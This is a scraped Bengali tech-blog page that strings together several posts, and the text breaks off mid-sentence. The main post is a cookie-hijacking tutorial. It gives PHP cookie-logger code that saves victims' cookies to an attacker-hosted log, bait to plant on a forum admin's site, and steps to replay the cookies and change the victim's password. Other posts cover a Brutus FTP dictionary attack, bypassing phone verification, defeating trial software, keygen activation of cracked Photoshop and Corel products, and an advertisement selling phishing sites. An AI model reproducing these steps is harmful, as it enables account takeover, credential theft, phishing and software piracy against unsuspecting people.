মাইটিউন্স

মাইটিউন্স

মাইটিউন্স

মাইটিউন্স

মাইটিউন্স

Sunday, September 29, 2013

ফেসবুক সহ যে কোন ধরনের আইডি হ্যাক করুন । কুকি হাইজাকিং করে ।

wireshark1.jpg
কুকি হাইজাকিং এমন একটা হ্যাকিং মেথোড যেটার দ্বারা অনেক গুরুত্বপুর্ন ও বড় বড় কিছু হ্যাক করা যায় । এর মাধ্যমে অন্যের পাসওয়ার্ড পেয়ে তুমি হ্যাকিং শুরু করে দিলে ।
ধরো ভিকটিম ফেসবুক, গুগল সহ অনেক যায়গায় ব্রাউজিং করে এবং ওইসব তথ্য তার ব্রাউজারে সেভ থাকে । তুমি যদি কারো কুকি পাও তাহলে তার অনলাইনের সব কিছুই হ্যাক করতে পারবে ।

How-to-hack-Facebook.jpg
কুকিলগার কি?
কুকি লগার এমন একটা জিনিস যেটা একটা সাধারন PHP স্কিপ্ট দ্বারা তৈরি করা হয় ।
এটার দ্বারা যে কারো তথ্য চুরি করে একটা লগ ফাইলে সেভ করে রাখা যায় ।
আজ আমি আপনাদের দেখাবো কি করে নিজের একটা কুকি লগার তৈরি করতে হয় । আশা রাখি আপনারা অনেক ভালো করে উপভোগ করবেন ।
Step 1: নিচের লিন্ক থেকে ফাইলটা ডাউনলোড করুন এবং এটাকে রিনেম করে Tipstune.gif: নাম দিন ।
Download it.

http://www.crocko.com/1702516956.html
Step 2: এখন নিচের কোডটা কপি করে Notepad এ পেস্ট করুন এবং এটাকে সেভ করুন cookielogger.php: নামে ।
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary ServerError,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” .$_GET["cookie"]) === FALSE)
{
echo “Temporary ServerError,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary ServerError,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary ServerError,Sorry for the inconvenience.”;
exit;
?>

Step 3: আবারো নতুন করে Notepad ওপেন করে কিছু না লিখে ওটাকে logfile.txt নামে সেভ করুন ।
Step 4: এবার ফাইলগুলা আপনার যে কোন একটা হোস্টিং এ আপলোড দেন । সবথেকে ভালো হয় যদি পেইড হোস্টিং থাকে ।
ফাইলগুলার লিন্ক দেখতে নিচের মত হবে ।
* cookielogger.php ->
http://www.yoursite.com /cookielogger.php
*logfile.txt ->
http://www.yoursite.com /logfile.txt
*Tipstune.gif ->
http://www.yoursite.com /fun.gif
Step 5: এবার ধরুন আপনি একটি ফোরাম সাইটের এডমিনের কুকি হাইজাকিং করবেন । তাহলেঃ তার ফোরাম সাইটে গিয়ে নিচের কোডটা কপি পেস্ট করে একটা পোস্ট করুন ।
Download it.

http://www.crocko.com/1702516964.html
Step 6: এবায় যখন ওই এডমিন উক্ত পোস্টা দেখবে তখন সে তোমার ওই ইমেজটা দেখবে । এবং কৈতুহল বশত ওটাতে ক্লিক করবে । সে যখনই ক্লিক করবে তখনই একটা Eror ম্যাসেজ দেখাবে । ব্যাস তার অজান্তেই কুকি গুলা হাইজাক হয়ে গেলো । কুকি গুলা log.txt ফাইলে পাবে ।
কুকি দেখতে নিচের মত হবে ।
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: ভিকটিমের এক্যাউন্ট হ্যাক করে অনুমতি পাবার জন্য একটা ছোট্ট কাজ করতে হবে । আর সেটা হলোঃ তোমার কুকির সাথে ভিকটিমের কুকি Replace করতে হবে ।
এই কাজের জন্য Cookie Editor টুলসটা ব্যাবহার করতে পারো ।
“=” চিহ্ন এর আগের টুকু কুকির নাম । এবং “=” এই চিহ্ন এর পরেরটুকু কুকির ভ্যালু ।


সুতরাং Cookie Editor এ কুকির ভ্যালুটা চেন্জ করতে হবে ।
Step 8: এখন সেই ফোরাম সাইটে যাও । যেটা তুমি হ্যাক করতে চেয়েছিলে । দেখবে তুমি লগইন অবস্থায় আছো । এখন আস্তে করে পাসওয়ার্ডটা চেন্জ করে ফেলো আর সাইটকে একটা ছোট্ট বাঁশ দিয়ে চলে এসো ।

Session_Hijacking_3.JPG
Note : তবে ভিকটিম যদি সাইটে লগআউট করে দেয় তাহলে তোমারও লগআউট হয়ে যাবে । তবে তুমি যদি একবার পাসওয়ার্ড চেন্জ করে ফেলতে পারো তাহলে আর বারবার কষ্ট করা লাগবে না ।
Disclaimer: এই হ্যাকিং এর জন্য 0ld D3vil, Md sagor, tipstune, H@ck1ng Sch00l আমরা কেওই দায়ি থাকবো না । কারন এটা আপনি নিজ দায়িত্বে ব্যাবহার করবেন ।

ডেমো কিংবা ট্রায়াল সফটওয়্যারকে সারা জীবন ব্যবহার করুন

আজকে একটি ভালমানের সফটওয়্যার নিয়ে এসেছি সবার জন্য।কিছু সফ্টঅয়ার আছে যেগুলো ফ্রিব্যবহার করতে দেয় আবার কিছু সফ্টঅয়ার আছে যা৩০/৯০দিনের জন্য ট্রায়াল হিসেবে দিয়ে থাকে।যখন ৩০/৯০ দিন শেষ হয় তখনসেটি বন্ধ হয়ে হয়ে যায়।সেটি বন্ধ হলেএকটা নির্ধারিত টাকার বিনিময়ে ক্রয়করে ব্যবহার করতে হবে।আপনি ইচ্ছে করলে একটি ছোট্ট সফট (মাত্র ১.১ এমবি) দিয়ে ডেমো কিংবা ট্রায়াল সফটওয়্যার সারাজীবন ব্যবহার করতেপারবেন।
সফটটির নাম টাইমস্টপার।টাইমস্টপার আপনাকে সাহায্য করবে ট্রায়াল সফটএর দিনগননাকে বন্ধ করতেযেটা সফট ইন্সটল এর দিন থেকে শুরু হয়েছিল।

এখন দেখুন সফটটি কিভাবে ব্যবহার করবেনঃ

  • ১ম ধাপঃসফটটি সেটাপ দিন।তারপর ওপেন করুন।
  • ২য় ধাপঃব্রাউজ করে দেখিয়ে দিন *.exe file যেই সফট এর সময় পেছাতে চান।
  • ৩য় ধাপঃনতুন একটা ডেট দিনযেটা হবে ট্রায়াল প্রিয়ড এর মধ্যে যেকোন দিন।
  • ৪র্ থঃনতুন জীবন পাওয়া সফট এর আইকন এর নাম দেবার জন্য নাম লিখুন।
  • ৫মঃ এখন থেকে নতুন তৈরী হওয়া আইকন দিয়ে ব্যবহার করতে থাকুন।
ডাউনলোড লিঙ্কঃ (Downloader)   http://timestopper.blinkweb.com/ 
Direct Download Link (without downloader): Click Here
Direct Download Link টা আমার এক বড় ভাই আপলোড করেছেন। আগে টেকটিউনস্ এ কেউ এ বিষয়ে যদি টিউন করে থাকে তাহলে তার কাছে ক্ষমা চাইছি।প্রথমে একবার এ পোষ্টটি টিটি delete করে দিয়েছিল। এর কারণটি যদি টিটি আমাকে বলে তাহলে পরবর্তী পোষ্টগুলিতে শতর্কতা অবলম্বন করতাম।

ফোন ভেরিফিকেসান বাইপাস করুন-রেজিস্ট্রেসান ছাড়া।

প্রথমে এখানে যান, http://receive-sms-online.com/



উপরের মত একটি পেজ আসবে।যেকোন একটি নাম্বার কপি করুন । এবার আপনি যে সাইট এর ফোন ভেরিফিকেসান বাইপাস করতে চান (যেমনঃ Google/Ebay/etc) ফোন ভেরিফিকেসান নাম্বার এর ঘরে কপি করা নাম্বারটি পেস্ট করুন।OK করুন এবং পুনরায় http://receive-sms-online.com/  এখানে আসুন, যে নাম্বারটি কপি করেছিলেন সেটি উপর কপি করুন।
এমন একটি ম্যাসেজ পাবেনঃ check it out there is your code sent by google, youtube or whatever else

ডিকশনারি অ্যাটাক

Dictionary Attack


পাসওয়ার্ড যদি সহজ কিছু হয় তাহলে এই নিয়মে টা ক্র্যা-ক করা সম্ভব হয়। ডিকশনারি অ্যাটাকিং টুল একগুচ্ছ  নির্ধারিত শব্দ বারে বারে লগিনের সময় ব্যাবহার করে। উদাহরণটি দেখলেই পরিষ্কারভাবে বুঝতে পারবেন। কঠিন পাসওয়ার্ড ক্র্যা-কিং এর ক্ষেত্রে এ পদ্ধতি কাজ করে না।  নিম্নলিখিত উদাহরণে আমি একটি এফটিপি সার্ভারে ডিকশনারি অ্যাটাক দেখাতে Brutus ব্যাবহার করবো।
১) প্রথমে হ্যাকার একটি লক্ষ্য বেছে নিবে। ধরি আমার বাসার কম্পিউটার এর আইপি অ্যাড্রেস হলো  127.0.0.1 ।
২) এফটিপি তে যাওয়ার পর ftp://127.0.0.1 এ আমি উজারনেম এবং পাসওয়ার্ড এর জন্য একটি pop-up বাক্স দেখতে পাই।
৩) এরপর হ্যাকার পাসওয়ার্ড ক্র্যা-ক করার জন্য একটি প্রোগ্রাম চালু করবে। আমি এখানে Brutus ব্যাবহার করবো।
৪) টার্গেট ফিল্ডে আপনার আইপি বসান আর টাইপ হিসেবে এফটিপি সিলেক্ট করুন।
৫) ডিফল্ট পোর্ট ২১ কিন্তু কিছু ওয়েবসাইট বেশী নিরাপত্তার জন্য টা চেঞ্জ করে রাখে। তাঁর জন্য পোর্ট স্ক্যান করতে হয়। এটা নিয়ে পরে আলোচনা করবো।
৬) আপনাকে এফটিপি সাইটের উজারনেম জানতে হবে। না জানলে সবচেয়ে বেশী ব্যাবহার করা হয় এমন তালিকা পেতে হবে।
৭) একটি ডিকশনারি অ্যাটাক এর জন্য পাসমোড ও শব্দ তালিকা বেছে নিতে হবে। ব্রাউজ করে শব্দ তালিকা ভুক্ত ফাইলটি বেছে নিতে হবে। তাহলে কিছু ভালো পাসওয়ার্ড পেতে পারেন। http://packetstormsecurity.org/Crackers/wordlists/
নিচে কিছু  ইউজারনেম ও পাসওয়ার্ড কেমন হতে পারে দেয়া হলো।
৮ ) প্রোগ্রামটি চালু করার সাথে সাথে এটি সার্ভারে সংযোগ করবে এবং  তালিকা থেকে সমস্ত সম্ভব বিন্যাস চেষ্টা করতে শুরু করবে।
৯) যদি পাসওয়ার্ড সহজ হয় তাহলে সঠিক উজারনেম ও পাসওয়ার্ড এর বিন্যাস পেয়ে যাবেন। যেমন নিচে দেখুন ঠিক উজারনেম ও পাসওয়ার্ড এর বিন্যাসঃ
username : admin
password : catsanddog
১০) স্মার্ট হ্যাকার এরকম প্রোগ্রাম ব্যাবহার করার সময় প্রক্সি ব্যাবহার করবে। প্রক্সি আপনার কম্পিউটার এর আইপি হাইড করে অন্য একটি কম্পিউটার এর মাধ্যমে আপনার টার্গেট এ রিকুয়েস্ট পাঠাবে । Brutus টার্গেটেড সার্ভারে আপনার উপস্থিতির একটি বিশাল কার্যবিবরণী পাঠায়।
১১) এখানে দেখাই যাচ্ছে যে 127.0.0.1  হ্যাকার এর আইপি অ্যাড্রেস । এইসব চিহ্নের জন্য একজন হ্যাকার ধরা খায় এবং আইনের বিভিন্ন ঝামেলায় পরে ।

এবার আপনার মেইল অ্যাকাউন্ট যে হ্যাক করবে সেই উল্টা হ্যাক হবে ।{এন্টি হ্যাক}

কেমন আছেন , আমি কিন্তু ভাল আছি , আমি আমার হ্যাকিং জোন কে আবার সুরু করছি ,

আজকের বিষয় ঃ মেইল অ্যাকাউন্ট হ্যাক কারিকে হ্যাক করা ।

দিন দিন হ্যাক কারীর সংখ্যা বেড়েই চলছে। :cry:
এমন অনেকে আছেন যাদের ই-মেইল আইডি হ্যাক্ড হয়েগিয়ে ছিল,
অনেক কষ্টের পরে ই-মেইল আইডিটি পাইচেন  :-D বাট অনাকেই পারেন নাই , :cry:
মাঝে মাঝে আপনার আইডি ব্যবহার করে কিন্তু  আপনি তা টের পাননা।
এমন প্রমাণ অনেক আছে বলে আজ আমি আপনাদের সাথে ই-মেইল হ্যাকারকে সনাক্ত করার জন্য ছোট একটা টিপস্ শেয়ার করছি ।

প্রথমে আপনার জি-মেইলটি সাইন-ইন করুন।
হ্যাকারকে সনাক্ত করতে বা কে, কোথায় বা কোন দেশে থেকে এবং কোন সময়ে আপনার মেইল আইডিটি ব্যবহার করা হয়েছিল তা জানতে, মানে কোন আই.পি (ইন্টারনেট প্রটোকল) ঠিকানা থেকে আপনার মেইল ঠিকনায় প্রবেশ করেছিলো? তা জানতে Last account activity এর ডান পাশে Details এ ক্লিক করুন|
Details এ ক্লিক করার পর নতুন একটি পেজ আসবে। পেজটিতে আপনার কম্পিউটারের চলমান আই.পি (ইন্টারনেট প্রটোকল), ঠিকানা এবং গত দশবার কখন, কত তারিখে, কোন আইপি থেকে আপনার জি-মেইল এ প্রবেশ করা হয়েছিলো তা একটি তালিকার মাধ্যমে দেখাবে।
যদি একই কম্পিউটার বা ল্যাবটপ থেকে সাইন-ইন করে থাকেন এবং একই কোম্পানীর ইন্টারনেট ব্যবহার করে থাকেন তাহলে আইপি ঠিকানার চারটি অংশের মধ্যে প্রথম দুটি ঠিকানা অভিন্ন থাকবে। আবার যদি দেখেন যে অন্য আইপি ঠিকানা থেকে ভিন্ন সময়ে আপনার মেইলে প্রবেশ করা হয়েছিল এবং সেই আইপি ঠিকানার বিস্তারিত তথ্য জানতে চাইলে, আইপি ঠিকানাটি Copy করে এই এড্রেস এ যান। তারপর টেক্সটবক্সে আইপি ঠিকানাটি Paste করে দিয়ে ip whois এ ক্লিক করুন। তাহলে তাদের ঠিকানা, ফোন নং, তাদের মেইল আইডি সহ আরো অনেক তথ্য আপনি জানতে পারবেন। :lol:

আসা করি আমি চেইন টিউন চালিয়ে জেতে পারবো ,  ভাল লাগলে অবশ্যই জানাবেন।

যদি কেও wapka ফিশিং সাইট কিনতে চান তাহলে যোগাযোগ করতে পারেন

আমার ফেবু আইডি - Farhan Sajid
আমার ফেবু হ্যাকিং পেজ - Bd Hackers

ফটোশপের গুরুত্তপূর্ণ একটি বিষয় : কিবোর্ড শর্টকাট

যারা কম্পিউটার ব্যবহার করেন তারা ফটোশপের নাম শুনেননি এমন মনে হয় কেউ নেই । গ্রাফিক্স/ডিজাইনে প্রোফেশনাল কাজে ফটোশপ যেমন ব্যবহার করা হয়, তেমনি নিজেদের ছোটখাটো গ্রাফিক্সের প্রয়োজনেও আমরা ফটোশপ ব্যবহার করি সব সময় । আমরা কম্পিউটার ব্যবহার করি যেনো কোন কাজ খুব তারাতারি করতে পারি । তাই সব প্রোগ্রামেই কিবোর্ড শর্টকাট থাকে ।
যারা প্রোফেশনাল তারা সবসময় শর্টকাট ব্যবহার করে থাকেন, তাই তাদের কাজের গতি সবসময় বেশি থাকে । ফটোশপের শর্টকাট আমরা সবাই কম বেশি জানি এবং ব্যবহার করি । আমি ইন্টারনেটে খুব সুন্দর একটা ছবি পেয়েছি যেখানে কম্পিউটারের কিবোর্ড লে – আউটে সকল শর্টকাটের লিস্ট দেয়া আছে । তাই সেটা আমি আপনাদের সাথে শেয়ার করছি ।
বড় সাইজে দেখা/সেভ করার জন্য ছবির উপরে ক্লিক করুন

আশা করি ফটোশপের এই কিবোর্ড শর্টকাট লে-আউটটি আপনাদের সকলের অনেক কাজে লাগবে ।
সূএ

১০টি অসাধারন মোটিভেশনাল HD ওয়ালপেপার সাথে উইন্ডোজ থিম

আবার হাজির হলাম আপনাদের মাঝে। টিউনের টাইটেল দেখে নিশ্চয়ই বুঝতে পেরেছেন আমি আজ মোটিভেশনাল HD ওয়ালপেপার নিয়ে লিখছি। আজকে যেই মোটিভেশনাল HD ওয়ালপেপারগুলো আমি আপনাদের সাথে শেয়ার করব সেগুলো অনেক সুন্দর এবং আপনার খারাপ মুহুর্তগুলো দূরে সরাতে সাহায্যে আসতে পারে। এই ছবিগুলোর সবগুলোর রেজুলেশনই ১৯২০x১০৮০ অথবা ১০৮০x720। চলুন বেশী কথা না বলে দেখে নেই কি থাকছে আজকে।
Photo 1:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXgZSg32huYRLh7NbnRQAm6Xf6dnrBDp5BkwUkknmIONrDSysIAHKoS93aTIB7V2YkbPT9R_9_DlN6Mi2QHGS13ckOe4q7PYyHjQKQbETdC_nxnsOopruxJoqH53FM23XKuvX9syvt6by7/s1600/Creative_Wallpaper__Enjoy_your_own_life_without_comparing_it_with_that_of_another_028503_.jpg
Photo 2:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7zjSwskDV4qrdCpltlVXtNcaI3nZtezYomVnWPbVYlCI2m6H75OwqYbBg66Fu9eC_s_8gYZpvwn6Zs2Prodh75ixNJWHTDXAMVX47uCAD5KdavcDviONClnjYIwzDD6YKc797gRhn7go/s1600/Half-Truth-is-Always-Lie.jpg
Photo 3:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6BLnWsBABSYzt5S-JLVqNLiPtffs4BjG2NJ0d-GxjU_p8GBE9ISfWuRCv9DIT-IdNmOA9-IsLTRKFaJxLIIUghxE0XZRp_9LxeLMAkoQz0XpfhK7sVn40E840aRUgKHPq2AyODtAy9PQP/s1600/I-Will-Win-not-Immediatly-But-Definitely.jpg
Photo 4:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL9mGpgzOFYwEtETAqGRwXMkIWbkAyVR09x-rCJYFU_6ARVKCemR4YHbRG_xIfeUQhh5gHfdjoKX4vATUHxqdWD1GOwshncsV9C6ANA3cNwdedDAx7P8UaUlNI6yXLThMx4scX4DKXDXbA/s1600/motivational-124h.jpg
Photo 5:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJBq9P5xYMnhB5vv-0b5cCBKM5V3pKSQZlBnS54k8LfuIzZZYgIeWhni8KzJzipM3Wmf6HC_3A48w_6LrmEfKXviiAoiNG3vgQHKstov5UfUcvWyzlPaR5YLXRYjELXy7RB4WypRVbOmQd/s1600/motivational-159h.jpg
Photo 6:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAgBSCKOuS90aKYd2iRr2nINtE2WlsOgYH-Urj8YVIlqVNeOK-2cbJ7s9CFjIhH_seuK3KSVShzz0T1IhyphenhyphenUSLf3zZibSowipDiEj9X3juXfU9bdARF6PMbG_M_TEkGveap_OnkS_ld6mhB/s1600/motivational-227a.jpg
Photo 7:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw8B5pKykyjB0TmpzpmP0Czs64598v4dvuIJmDRUvz-ZIXnj5UN9t9VosUBMOU1-1T8FhLJoE4-cMnnTyIlqhxUVMhcJt9ybcXkxYhR-xgEfxVEp6ab-6W2bARnlHV9CXrf6yj4zfsC2LQ/s1600/motivational-239v.jpg
Photo 8:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAhROPY-pB2EH9zvpX44pvPKWYBQ-JDtOFj4KBBI5l3rOxK92-32kT6a7a3_w-Oeap_77gvBIYpX1gzrSqukmaPtS-t4DorTi_wNlmBf6N0ZiDap7RJISOvvxGa50WsUo-m9cUGqnY43Gw/s1600/motivational-245a.jpg
Photo 9:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfZ-9UpDufe29b3oRol_11oc9L0isog-F4Auhua8DSDbCKkAeYeTD40g1lteZ2NOCDgiwmmOWQW77_3UmQ_v_V5-G5vjt4Q1Mo44O0Vem_G0SG5AK54EM37eFmRo0nTIzXgybI7Br9zJjx/s1600/motivational-253a.jpg
Photo 10:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIRZc9uSb0AU-AsV8qXTGQeDiY-GyHftwcGH10wR_vj-J1x1wdCP3jzCcs0OF1KFBjl0YND7LOppV3xMuCrMbmB-dAyiBSyfoXkOs9jYgu3kG2vZ4bS_z6-LXMeEnzVyJTFNIB9TfQdFhf/s1600/motivational-275a.jpg
সবগুলো পিকচার একসাথে এখান থেকে ডাউনলোড করতে পারেনঃ Motivational HD Wallpapers
উপরের ছবি গুলো দিয়ে বানানো উইন্ডোজ এর জন্য থিমপেক ডাঊন করতে পারেনঃ Motivational HD Windows Theme
এই পোষ্ট টি পূর্বে এখানে প্রকাশিতঃ Top 10 Incredible and Motivational HD Wallpaper

সৌজন্যেঃ Designprotrick
ধন্যবাদ সবাইকে।

ফটোগ্রাফার/গ্রাফিক্স-ডিজাইনাররা লক্ষ্য করুন। কিছু পেলে ভালো, না পেলে আরো ভালো, ব্যান্ডউইথ বাচবে। +ফটোশপ প্লাগইন্স

সবাইকে সালাম ও শুভেচ্ছা। আজ ২৫০তম টিউন মানে ছোট্ট একটা জংশনে এসে দাড়িয়েছি।হাটি হাটি পা পা করে এত দূর আসবো............... কল্পনাই করিনি।আপনাদের সমর্থন তা করতে উৎসাহ জুগিয়েছে দারুন।টেকটিউনস সংশ্লিষ্ট সবাইকে ধন্যবাদ সে কারনে।
আপলোড করা আছে বেশ কয়েকটি সফটওয়্যার।প্রতিবারই তাই করি কিন্তু সময়ের কারনে সবসময়  সবগুলো শেয়ার করা হয়ে উঠে না।আজও দেখা যাক কতদুর যেতে পারি।তবে প্রতিবারই প্রত্যাশা নিয়ে শুরু করি যার কমতি আজও নেই।যারা আছেন আমার সঙ্গে তারা শেষ পর্যন্ত থাকুন।দেখা যাক কতদূর কি হয়।প্রথমে শুরু করছি ফটোগ্রাফী দিয়ে।

ADOBE PHOTOSHOP CREATIVE CLOUD 14 (pre activate)


কেউ কেউ মনে হয় চোখ কুঁচকে তাকাচ্ছেন যে প্রবাসী তো দারুন ধান্দাবাজ কারন এটা উনি অনেক আগেই শেয়ার করেছেন।আবার কেন শেয়ার?আমি বলি আপনার পকেটে টাকা আছে,আনলিমিটেড নেট ইউজ করেন তাই হয়ত নামাতে পেরেছেন কিন্তু সবাই তো আর আপনার মত না যে এত বিশাল ফাইল ইচ্ছে করলেই নামিয়ে ফেলবে।তার উপর আবার (ক্র্যা)কের ঝামেলা অনেকেই বুঝে উঠতে পারেন না।যারা অতীতে পারেননি তাদের জন্য আজকের PHOTOSHOP CREATIVE CLOUD 14  যার সাইজ মাত্র ৩০৩ মেগাবাইট।তাও আবার প্রি এক্টিভেট।অতীতে যারা বিভিন্ন কারনে নামাতে পারেননি তারা আজকে নাময়ে ফেলুন।আর আজও নামাতে না পারলে অপেক্ষায় থাকুন হয়ত কী আরও ছোট সাইজ নিয়ে টিউন করবে।যারা ইচ্ছুক তারা নামিয়ে নিন কপি থেকে।
COPY
ডাউনলোড (৩০৩ মেগাবাইট)
FILESWAP
পার্ট ১ (২০০ মেগাবাইট)
পার্ট ২ (১০৩ মেগাবাইট)

আমি শুধু ইন্সটল করেছি এবং সরাসরি কাজ করেছি।কোন কিছুই করতে হয়নি।যদি সমস্যা করে তবে বলবেন ঔষধের ব্যবস্থা করে দেবো।তাহলে আজ থেকে শুরু করুন ফটোশপের সর্বশেষ ভার্সন cc 14.

COREL PAINT SHOP PRO X6 ULTIMATE


এই সফটওয়্যারটি নিয়ে বিশাল এক ধরা খেয়েছি।মজা করে নামিয়েছিলাম corel paint shop pro x5 এবং আপলোডও করেছিলাম।তখন কি আর জানতাম x6 বের হয়েছে?যখন জানলাম তখন মনটা খারাপ হয়ে গিয়েছিলো।আবার নামালাম,আবার আপলোড করলাম কারন আপনাদের আমি সর্বোচ্চ ভালো জিনিসটিই দিতে চাই।
সফটওয়্যারটি বেশীক্ষন বযবহার করার সৌভাগয আমার হয়নি।৫ মিনিটের মত  করেছি।এক কথায় দারুন।যারা ফটোশপকে অনেক কঠিন মনে করেন তারা এই সফটওয়্যারটি ব্যবহার করে দেখতে পারেন।

অনেক কিছু আছে যা ফটোশপে করতে গেলে অনেক কাঠ খড় পোড়াতে হয় সে কাজগুলো আপনি এখানে করতে পারেবন এক ক্লিকে।বিভিন্ন ডিজাইন আছে যা আপনি আপনার ছবির সাথে এ্যাড করতে পারবেন মাতে এক ক্লিকে যাতে আরো সুন্দর হবে আপনার প্রিয় ছিবিটি।এই সফটওয়্যারটি সম্পর্কে বিস্তারিত জানতে এখানে ক্লিক করুন।আশা করছি কারো অপছন্দ হবে না।এবার আসছি ডাউনলোডের কথায়।সাইজ মাত্র ২৩২ মেগাবাইট।মনে রাখবেন আপনার সফটওয়্যারটি শুধু PAINT SHOP PRO X6  শুধু নয়,সঙ্গে ULTIMATE  শব্দটাও আছে।দেবো যখন ভালোটাই দেবো কি বলেন?

COPY

ডাউনলোড

FILESWAP

ডাউনলোড
IDM দিয়ে নামাতে বেশী সময় লাগার কথা নয়।যদি নামিয়ে থাকেন তাহলে আসেন এখন ফুল ভার্সন ফুল ভার্সন খেলা খেলি যে খেলা আপনারা আমার সাথে আগেও খেলেছেন।
প্রথম ইন্সটল করুন।নীচের মত ছবি আসবে।ল্যাঙ্গুয়েজ সিলেক্ট করুন।

বাকি কাজ শেষ করুন।ছবি দেখুন।

সবকাজ শেষ হয়ে গেলে ডেস্কটপে দেখুন আইকোন আছে।ওটাতে ক্লিক করুন।নীচের মত পেজ আসবে।কেটে দিন কোন দরকার নেই।

কাটামাত্রই নীচের মত পেজ আসবে।
দেখানো জায়গায় মানে already purchased?এ ক্লিক করুন।ক্লিক করা মাত্রই নীচের মত পেজ আসবে ।এবার (কি)জেন খুলুন।যা বলছি করুন।
১ নং এ ক্লিক করলে নাম্বার দিবে।কপি করে
২ নং এ ্নাম্বার দিবে।সেটা
৩ নং এ পেষ্ট করুন এবং
৪ নং এ  phone corel এ ক্লিক করুন।(কি)জেন বন্ধ করবেন না।
এবার নীচের মত পেজ আসবে।
১ নং থেকে instalation code কপি করুন
২ নং এ (কি)জেনের ঘরে পেষ্ট করুন
৩ নং এ generate activation code এ ক্লিক করুন
৪ নং থেকে কপি করুন
৫ নং এ পেষ্ট করুন
৬ নং এ continue চাপুন
কাজ হলে ত প্রবাসীকে ভুলে যাবেন।ধন্যবাদটুকুও দিবেন না।

ADOBE PHOTOSHOP PLUGINS ZONE


অনেকদিন থেকে কোন প্লাগইন্স শেয়ার করা হয় না।আসলে খুঁজে পাওয়াই কষ্টকর কারন ভালো যা কিছু তা শেয়ার করা হয়েছে অনেক আগেই।তারপরেও ২/১টা চোখে পড়লে ছেড়ে দেই না।মাছ না থাকলে পুঁটি মাছই ভালো।আজ দু'টো প্লাগইন্স শেয়ার করছি।দেখুন ভালো লাগে কি না।

FLUID MASK 3


জানি না এই প্লাগিনটি কি কাজে লাগে।মনে হয় সুন্দরী মহিলারা আরো সুন্দরী হয়ে যায়।কি হয় না হয় আপনারা এখানে ক্লিক করে জেনে নিন।দরকার থাকলে এক ক্লিকে কপি থেকে কপি করে নিতে পারেন মাত্র ৪৯ মেগাবাইটের এই পোর্টেবল প্লাগইনটি।
ডাউনলোড
পোর্টেবল তাই কিছুই করতে হবে না শুধু কাজ করুন।

 BEAUTY BOX PHOTO 3


অত্যন্ত দুঃখের সঙ্গে জানাচ্ছি যে যারা CC14 ব্যবহারকারী তারা এই প্লাগইনটি ব্যবহার করতে পারবেন না।তবে cs6 এ কাজ করবে (পরীক্ষিত)।বিস্তারীত জানতে কষ্ট করে এখানে ক্লিক করুন।যারা ডাউনলোডে আগ্রহী তারা নামিয়ে নিতে পারেন ২০ মেগাবাইটের এই প্লাগইনটি।
ডাউনলোড
ইন্সটল করুন।(ক্র্যা)ক ফাইলটি /c drive/programs/adobe/photoshop cs6/plug-ins/Digital Anarchy/Beauty Box PS 3.0.4 ফোল্ডারে ঢুকিয়ে ক্লিক করুন।কাজ শেষ।এবার ফটোশপ খুলে ফিল্টার অপশনে গিয়ে বুঝে নিন।
ভালো থাকুন সবাই।খুব শীঘ্রি দেখা হচ্ছে আবার ||| আল্লাহ হাফেজ |||

ডোমেন কী?কিভাবে Domain ক্রয় করা য়ায(আনভেরিফায়েড পেপাল দিয়ে)চিত্র্র সহ ১০০%

ডোমেন কী?
সাধারণ ভাবে বলছি দরুন আপনি কোন একটি
ঠিকানায়(website)এ প্রবেশ করলেন যেমন: http://www.shobkeso.com
এই যে আপনি এই ঠিকানায় ডুকলেন এটি হল একটি ডোমেন ঠিকানা।
আপনার মনে হতে পারে আপনার নামে একটি এই রকম ঠিকানা
থাকুক। তাই আনাদের জানাবে কীভাবে একটি ডোমেন রেজিস্ট্রেশন
করতে হয়।
আর একটু বিস্তারিত বলি, একটি Domain Name এর জন্য
আপনার কী কী লাগবে? বা এর জন্য আপনার কত টাকা খরচ হবে? বা আপনি কী ভাবে ক্রয় করবেন এই যে আপনার এত প্রশ্ন
সকল প্রশ্নের উত্তর দিতে আপনাদের জন্য সবকিছু ডট কম হাজির: ত আর কথা না বলে শুরু করি।
**প্রথমে যা লাগবে তা হল যারা Domain Name রেজিস্ট্রেশন
করে তাদের website এ প্রবেশ করা। আপনাদের সুবিধার জন্য বলি
বিশ্বের এক নম্বর ডোমেন রেজিস্ট্রার কোম্পানি হল Goodady dot
com. তার পর হল Name Cheap.com আরও কনেক।
**আপনি এদের web site এ প্রবেশ করুন তার পর একটি
Account করুন। (আমি নেমচিপ ডট কম ভালবাসি কারণ
আনভেরিফায়েড পেপাল দিয়ে ডোমেইন ক্রয় করার সুবিধা)আমি
NameCheap এর নিয়ম দেখাব কিভাবে আনভেরিফায়েড Paypal
(paypal হল বিশ্বের সবচেয়ে বড় online পেমেন্ট Getway) দিয়ে
Domain ক্রয় করা যায়।
**এর জন্য আপনার কত খরচ হবে তাই ত ? বলছি মাত্র দশ
থেকে এগার ডলার (তবে কিছু কিছু সময় ছাড় পাওয়া যায়া)
১. প্রথমে  Name Cheap.com এর web site এ প্রবেশ
করুন NameCheap.com কিল্ক করুন। (একটি Account করে
নিন। এখানে)সমস্যা হয়ে কমেন্ট করুন।

নিচের মত একটি পেউজ দেখতে পাবেন। সাচ বক্সে আপনার কাংখিত
ডোমেইনটি লিখে সাচ দিন। যেমন টি আমি দিয়েছি।
Search বাটনে ক্লিক করুন। নিচের মত চিত্র দেখতে পাবেন। আপনার
